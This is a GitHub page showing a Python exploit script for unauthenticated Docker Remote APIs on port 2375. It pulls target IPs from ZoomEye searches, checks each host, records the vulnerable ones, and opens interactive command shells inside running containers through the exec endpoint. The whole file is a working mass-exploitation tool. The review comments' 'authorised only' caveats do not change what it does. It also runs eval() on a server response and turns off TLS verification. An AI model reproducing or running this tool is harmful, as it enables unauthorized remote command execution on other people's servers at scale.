-
Notifications
You must be signed in to change notification settings - Fork 22
Expand file tree
/
Copy pathdockerAPI_Exploit.py
More file actions
227 lines (210 loc) · 7.33 KB
/
dockerAPI_Exploit.py
File metadata and controls
227 lines (210 loc) · 7.33 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
# -*- coding:utf-8 -*-
import requests
import urlparse
import argparse
import json
import socket
import time
import sys
class scan():
# Constructor: every scanner instance starts with no flagged endpoints.
def __init__(self):
# URLs that Check() reported as vulnerable, in the order they were found.
self.VulnerabilityIp = []
def Check(self, url):
    """Report whether ``url`` answers like an unauthenticated Docker Remote API.

    Sends ``GET <url>containers/json`` with a 5 second timeout (``url`` is
    concatenated as-is, so it is expected to end with ``/``).  The endpoint
    is reported as vulnerable when the ``Server`` response header mentions
    ``Docker`` and the response body contains ``Command``; ``url`` is then
    appended to ``self.VulnerabilityIp``.  The verdict is printed either way.

    Only probe hosts you own or are explicitly authorised to assess.

    Args:
        url: Base URL of the candidate endpoint, e.g. ``http://host:2375/``.

    Returns:
        1 when the request could not be completed, otherwise None.
    """
    Check_Url = url + 'containers/json'
    try:
        TestRe = requests.get(Check_Url, timeout=5)
    except requests.RequestException:
        # Connection errors, timeouts and malformed URLs all end up here;
        # Ctrl-C and programming errors are no longer swallowed.
        print("Can not connect URL Timeout!")
        return 1

    # requests exposes response headers through a case-insensitive mapping,
    # so a single lookup covers both 'server' and 'Server'.  Using .get()
    # avoids the KeyError the old code raised when the header was absent
    # (its `'server' or 'Server' in ...` guard was always true).
    server = TestRe.headers.get('Server', '')

    # Both conditions are required.  The old expression parsed as
    # `A or (B and C)`, which never applied the body test.
    if 'Docker' in server and 'Command' in TestRe.text:
        print("\33[31m%s :vulnerability\33[0m" % url)
        self.VulnerabilityIp.append(url)
    else:
        print('%s :not vulnerable' % url)
# Getshell(url, host, port): fetch the container list from
# `<url>containers/json?all=1`, print the running containers whose command is
# a shell, let the operator pick one, create an exec instance for it over
# HTTP, then send lines typed at the '$:' prompt over a raw TCP socket to
# host:port and print what comes back.
# NOTE(review): this opens a command session inside a container on the target.
# Run it only against systems you own or are explicitly authorised to test.
# NOTE(review): indentation and blank lines were lost in this copy of the
# file, so the loop nesting described below is inferred -- confirm against the
# original before changing anything.
def Getshell(self,url,host,port):
GetShell_Url = url+'containers/json?all=1'
count = 0
try:
TestRe = requests.get(GetShell_Url,timeout = 5)
except:
print "Can not connect URL Timeout!"
# exit() ends the whole process, not just this call.
exit()
date = TestRe.text
decoded = json.loads(date)
# One dict per selectable container; position in this list + 1 is the ID shown to the operator.
CtrlDocter = []
# Only containers whose 'Command' is exactly one of these strings are offered.
AccCommand = ['sh', '/bin/sh', '/bin/bash', 'bash', '/bin/csh', 'csh','/bin/ksh', 'ksh', '/bin/tcsh', 'tcsh', '/bin/zsh', 'zsh']
for entries in decoded:
# Keep entries whose Status contains "Up", does not contain "Exited", and whose Command is in AccCommand.
if ("Up" in entries['Status']) and ("Exited" not in entries['Status']) and (entries['Command'] in AccCommand):
count+=1
ID = count
DockerID =entries['Id']
Name = entries['Names']
Image = entries['Image']
Command = entries['Command']
# Only the first entry of 'Names' is kept; ID is stored as a string so it can be concatenated when printed.
detailed = {'ID':str(ID) , 'Name' :Name[0] ,'Image':Image , 'Command' : Command, 'DockerID' : DockerID}
CtrlDocter.append(detailed)
if count:
print "Control Container Number:%s" %count
for i in CtrlDocter:
print ""
for key , value in i.items():
print "\33[31m"+key+":"+value+"\33[0m"
else:
print "No Container Can Control"
# Nothing selectable: return None without prompting.
return
print 'Input exit to leave'
while True:
CtrlId = raw_input("Input Container ID:")
if CtrlId == 'exit':
break
# CtrlId is not validated: non-numeric input raises ValueError and an
# out-of-range number raises IndexError on the next line.
Command = CtrlDocter[int(CtrlId) - 1]['Command']
# Short id: first 12 characters of the container's 'Id'.
CtrlSId = CtrlDocter[int(CtrlId) - 1]['DockerID'][0:12]
PostUrl = url+'v1.20/containers/'+CtrlSId+'/exec'
HEADER= {
'User-Agent':'Docker-Client/1.8.0 (windows)',
'Content-Length':'156',
'Content-Type':'application/json',
'Accept-Encoding':'gzip'}
payload = '{"Tty": true, "Detach": false, "Container": "%s", "User": "", "AttachStdin": true, "Cmd": ["%s"], "AttachStderr": true, "Privileged": false, "AttachStdout": true}' %(CtrlSId,Command)
re = requests.post(PostUrl, headers=HEADER, data = payload)
decoded = json.loads(re.text)
# 'Id' of the JSON reply is used below as the exec instance id.
CreatedId = decoded['Id']
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host, int(port))
sock.connect(server_address)
# Request template sent verbatim over the socket; the words CreatedId,
# ContainerId and Command are placeholders substituted right after it.
# NOTE(review): whitespace inside this literal may not match the original file -- TODO confirm.
execDockerPOSTtwo = '''\
POST /v1.20/exec/CreatedId/start HTTP/1.1
Host: 115.123.123.79:2375
User-Agent: Docker-Client/1.8.0 (windows)
Content-Length: 163
Connection: Upgrade
Content-Type: text/plain
Upgrade: tcp
{"User":"","Privileged":false,"Tty":true,"Container":"ContainerId","AttachStdin":true,"AttachStderr":true,"AttachStdout":true,"Detach":false,"Cmd":["Command"]}
'''
execDockerPOSTtwo = execDockerPOSTtwo.replace('ContainerId', CtrlSId).replace('Command', Command)
execDockerPOSTtwo = execDockerPOSTtwo.replace("CreatedId", CreatedId)
time.sleep(1)
sock.sendall(execDockerPOSTtwo)
# First reply is read and stored but not used again in this function.
startinfo = sock.recv(1024*10)
while True:
cmd = raw_input('$:')
# The typed line is sent followed by a carriage return.
sock.sendall(cmd+'\x0d')
# Fixed 2 second pause before checking for 'exit' / reading the reply.
time.sleep(2)
# "exit" has already been sent to the remote side when this loop ends.
if cmd == "exit":
break
# A single recv of at most 10240 bytes is printed per typed line.
print sock.recv(1024*10)
# NOTE(review): presumably runs once per selected container, after the '$:' loop ends -- nesting not recoverable from this copy.
sock.close()
# Panel_Scan(Search_keyword, PageNum): log in to the ZoomEye API, run a host
# search, collect the 'ip' field of every match, run self.Check() against
# http://<ip>:2375/ for each one, print a summary and write the flagged URLs
# to success.txt in the current directory.
#   Search_keyword: query string; None selects the built-in default query.
#   PageNum: number of result pages to request; None means keep paging until
#            a response has no 'matches' key.
# NOTE(review): this probes hosts taken from a search engine, not a list of
# systems the operator controls -- make sure the scope is authorised before
# running it.
# NOTE(review): indentation was lost in this copy; the nesting of the paging
# loop is inferred -- confirm against the original.
def Panel_Scan(self,Search_keyword,PageNum):
GetTokenUrl = 'https://api.zoomeye.org/user/login'
# Placeholder credentials; they are sent as a JSON body to the login URL.
userinfo ={"username": "username",
"password": "password"}
# verify=False turns off TLS certificate verification for this request.
tokenrl = requests.post(GetTokenUrl,data = json.dumps(userinfo),verify=False)
# SECURITY(review): eval() executes the response body as Python code;
# json.loads() would parse it without executing anything.
data = eval(tokenrl.text)
Header = {'Authorization': 'JWT %s' %data['access_token']}
page = 1
# IP strings gathered from all fetched result pages.
TestIpArgs = []
if(Search_keyword == None):
key = 'port:2375 X-Content-Type-Options: nosniff country:"CN"'
else:
key = Search_keyword
while True:
try:
Searchurl = 'https://api.zoomeye.org/host/search?query=%s&page=%s'%(key,str(page))
print 'Search in page :'+str(page)
Searchre = requests.get(Searchurl,headers = Header,verify=False)
GetData = json.loads(Searchre.text)
if PageNum != None:
if page < int(PageNum):
page+=1
else:
break
else:
page+=1
# NOTE(review): if this loop sits after the `break` above inside the same
# `try`, the matches of the final requested page are never appended -- TODO confirm nesting.
for i in GetData['matches']:
TestIpArgs.append(i['ip'])
except Exception,e:
# The loop ends when the exception message is exactly 'matches' (the
# KeyError raised by GetData['matches']); any other exception is ignored
# here and the loop continues.
if str(e.message) == 'matches':
break
print 'Start Test...'
# 'w+' truncates any existing success.txt.
file = open('success.txt','w+')
for TestIp in TestIpArgs:
TestIp = 'http://'+TestIp+':2375/'
print 'test:\t'+TestIp
self.Check(TestIp)
if len(self.VulnerabilityIp):
print str(len(self.VulnerabilityIp))+' Vulnerability Url have found'
else:
print 'No Vulnerability Url found'
for IP in self.VulnerabilityIp:
print IP
file.writelines(IP+'\n')
# The handle is closed only on this path; an exception raised earlier leaves it open.
file.close()
def filescan(self, filepath):
    """Run ``self.Check`` on every URL listed in ``filepath`` and print a summary.

    The file is read as text with one URL per line.  Surrounding whitespace
    (including the ``\\r`` of CRLF files) is stripped and blank lines are
    skipped, so they are no longer passed to ``Check`` as empty or broken
    URLs.  After all lines are checked, the number of entries in
    ``self.VulnerabilityIp`` is printed, followed by each entry.

    Only list hosts you own or are explicitly authorised to assess.

    Args:
        filepath: Path of the text file containing the URLs.

    Returns:
        None.
    """
    # Read everything first so the handle is closed before any network
    # activity starts, and stays closed even if Check raises.
    with open(filepath, 'r') as handle:
        targets = [line.strip() for line in handle]

    for target in targets:
        if not target:
            continue
        self.Check(target)

    if self.VulnerabilityIp:
        print(str(len(self.VulnerabilityIp)) + ' Vulnerability Url have found')
    else:
        print('No Vulnerability Url found')
    for IP in self.VulnerabilityIp:
        print(IP)
# filegetshell(filepath): read one URL per line from `filepath`, print a
# numbered entry for each, then repeatedly ask for a 'UrlID' and pass the
# chosen entry's url/host/port to self.Getshell() until 'exit' is typed.
# NOTE(review): the selected entry is handed to Getshell, which opens a
# command session on the target -- authorised systems only.
# NOTE(review): indentation was lost in this copy; the loop nesting is inferred.
def filegetshell(self,filepath):
# The handle opened here is never closed in this function.
file = open(filepath,'r')
data = file.readlines()
count = 0
# One dict per input line: {'ID', 'host', 'port', 'url'}.
urlargs = []
for line in data:
count+=1
line = line.strip('\n')
TmpUrl = urlparse.urlparse(line)
# netloc is split on ':'; a line without an explicit port has no host[1]
# and raises IndexError on the next statement.
host= TmpUrl.netloc.split(':')
detail = {'ID':count,'host':host[0],'port':host[1],'url':line}
urlargs.append(detail)
print detail
while True:
num = raw_input('UrlID:')
if num == 'exit':
break
# num is not validated: non-numeric input raises ValueError, an
# out-of-range number raises IndexError.
self.Getshell(urlargs[int(num)-1]['url'], urlargs[int(num)-1]['host'],urlargs[int(num)-1]['port'])
# Command-line entry point: parse the options and run the selected modes.
#   -u URL   single target, e.g. http://host:2375/
#   -c       run Check on the -u target
#   -g       run Getshell on the -u target
#   -f       ZoomEye search followed by Check (Panel_Scan); -k sets the query,
#            -p the number of pages
#   -d FILE  run filescan on FILE
#   -s FILE  run filegetshell on FILE
# NOTE(review): indentation was lost in this copy of the file, so which
# statements belong to the `if` at the "single target" test below cannot be
# determined here -- confirm against the original before restructuring.
if __name__ == '__main__':
parse = argparse.ArgumentParser()
parse.add_argument('-u', dest = 'url' , help = 'example:http://111.222.333.444:2375/')
parse.add_argument('-c', dest = 'check' , action = 'store_true', default = False , help = 'check')
parse.add_argument('-g',dest = 'getshell' , action = 'store_true' , default = False , help = 'getshell')
parse.add_argument('-f',dest = 'zoomeye',action = 'store_true',default = False,help = 'Whether Use Zoomeye')
parse.add_argument('-k',dest = 'keyword',help = 'Search keyword default:port:2375 X-Content-Type-Options: nosniff country:"CN"')
parse.add_argument('-p',dest = 'PageNum',help = 'Search PageNum')
parse.add_argument('-d',dest = 'dictpath',help = 'Detection of URL in the file')
parse.add_argument('-s',dest = 'CtrlDict',help = 'Has confirmed the existence of loopholes, try to get shell')
args = parse.parse_args()
Action_check = args.check
Action_getshell = args.getshell
Action_Panel_Test = args.zoomeye
Search_keyword = args.keyword
PageNum = args.PageNum
filepath = args.dictpath
CtrlDictpath = args.CtrlDict
# Single-target mode: none of -f, -d, -s was given.
if(Action_Panel_Test != True and filepath == None and CtrlDictpath == None):
# args.url has no default, so it is None here when -u was omitted.
TmpUrl = urlparse.urlparse(args.url)
# [host, port] from the netloc; host[1] is read below, so a URL without an
# explicit port raises IndexError when -g is used.
host= TmpUrl.netloc.split(':')
# Rebuild the target as scheme://netloc/ -- path, params, query and fragment are dropped.
TestUrl = urlparse.urlunparse((TmpUrl.scheme,TmpUrl.netloc,'/','','',''))
# NOTE(review): the -f/-d/-s branches below use new_scan, so presumably this
# line is outside the `if` above -- TODO confirm.
new_scan = scan()
if Action_check == True:
print 'Start Test...'
new_scan.Check(TestUrl)
if(Action_getshell == True):
new_scan.Getshell(TestUrl , host[0] , host[1])
if(Action_Panel_Test == True):
new_scan.Panel_Scan(Search_keyword,PageNum)
if(filepath != None):
new_scan.filescan(filepath)
if(CtrlDictpath != None):
new_scan.filegetshell(CtrlDictpath)